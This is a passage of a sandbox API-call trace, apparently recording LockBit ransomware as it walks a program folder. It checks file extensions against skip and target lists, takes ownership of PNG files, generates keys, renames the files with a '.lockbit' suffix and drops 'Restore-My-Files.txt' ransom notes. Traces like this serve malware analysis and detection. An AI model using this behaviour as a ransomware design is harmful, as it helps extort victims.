lpString2=".png") returned 1 [0079.951] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.952] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.952] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.952] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.952] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.952] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.952] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.952] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.952] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.952] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png.lockbit") returned 80 [0079.952] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.953] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.953] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.953] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.953] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.954] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.954] RtlFreeAnsiString (AnsiString="\\") [0079.954] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.954] malloc (_Size=0x200) returned 0x77d800 [0079.954] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.954] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.954] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.954] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.954] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.955] CloseHandle (hObject=0x3c4) returned 1 [0079.955] free (_Block=0x77d800) [0079.955] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.955] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.955] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.955] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=9115) returned 1 [0079.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.956] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.964] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.964] malloc (_Size=0xb6) returned 0x1ff1e60 [0079.965] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb6, FileInformationClass=0xa) returned 0xc0000008 [0079.965] free (_Block=0x1ff1e60) [0079.965] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.965] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.965] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.965] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae0342, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72ae0342, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x559, dwReserved0=0x0, dwReserved1=0x0, cFileName="notes-static.png", cAlternateFileName="")) returned 1 [0079.965] lstrcmpiW (lpString1=".", lpString2="notes-static.png") returned -1 [0079.965] lstrcmpiW (lpString1="..", lpString2="notes-static.png") returned -1 [0079.965] PathFindExtensionW (pszPath="notes-static.png") returned=".png" [0079.965] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.965] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.965] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.966] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.966] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.966] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.966] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.966] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.966] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.966] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.966] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.966] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.966] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.967] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="notes-static.png") returned 1 [0079.967] lstrcmpiW (lpString1="ntldr", lpString2="notes-static.png") returned 1 [0079.967] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="notes-static.png") returned 1 [0079.967] lstrcmpiW (lpString1="bootsect.bak", lpString2="notes-static.png") returned -1 [0079.967] lstrcmpiW (lpString1="autorun.inf", lpString2="notes-static.png") returned -1 [0079.967] lstrcmpiW (lpString1="thumbs.db", lpString2="notes-static.png") returned 1 [0079.967] lstrcmpiW (lpString1="iconcache.db", lpString2="notes-static.png") returned -1 [0079.967] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.967] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned=".png" [0079.967] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.967] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.967] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.967] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.968] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.968] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.968] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.968] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.968] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.968] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.968] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.968] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.968] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png.lockbit") returned 78 [0079.968] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.969] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.969] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.969] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.969] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.970] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.970] RtlFreeAnsiString (AnsiString="\\") [0079.970] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.970] malloc (_Size=0x200) returned 0x77d800 [0079.970] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.970] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.970] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.970] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.970] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.971] CloseHandle (hObject=0x3c4) returned 1 [0079.971] free (_Block=0x77d800) [0079.971] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.971] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.971] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.971] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=1369) returned 1 [0079.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.972] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0079.980] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.980] malloc (_Size=0xb2) returned 0x1ff1e60 [0079.981] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0079.981] free (_Block=0x1ff1e60) [0079.981] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.981] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.981] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.981] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae0342, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72ae0342, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x505, dwReserved0=0x0, dwReserved1=0x0, cFileName="play-static.png", cAlternateFileName="")) returned 1 [0079.981] lstrcmpiW (lpString1=".", lpString2="play-static.png") returned -1 [0079.981] lstrcmpiW (lpString1="..", lpString2="play-static.png") returned -1 [0079.981] PathFindExtensionW (pszPath="play-static.png") returned=".png" [0079.981] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.981] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.981] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.982] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.982] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="play-static.png") returned 1 [0079.982] lstrcmpiW (lpString1="ntldr", lpString2="play-static.png") returned -1 [0079.983] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="play-static.png") returned -1 [0079.983] lstrcmpiW (lpString1="bootsect.bak", lpString2="play-static.png") returned -1 [0079.983] lstrcmpiW (lpString1="autorun.inf", lpString2="play-static.png") returned -1 [0079.983] lstrcmpiW (lpString1="thumbs.db", lpString2="play-static.png") returned 1 [0079.983] lstrcmpiW (lpString1="iconcache.db", lpString2="play-static.png") returned -1 [0079.983] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.983] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned=".png" [0079.983] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.983] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.983] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.983] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.983] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.983] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.983] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.983] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.983] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.984] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.984] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.984] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png.lockbit") returned 77 [0079.984] CreateFileW (lpFileName="C:\\\\Program Files\\DVD 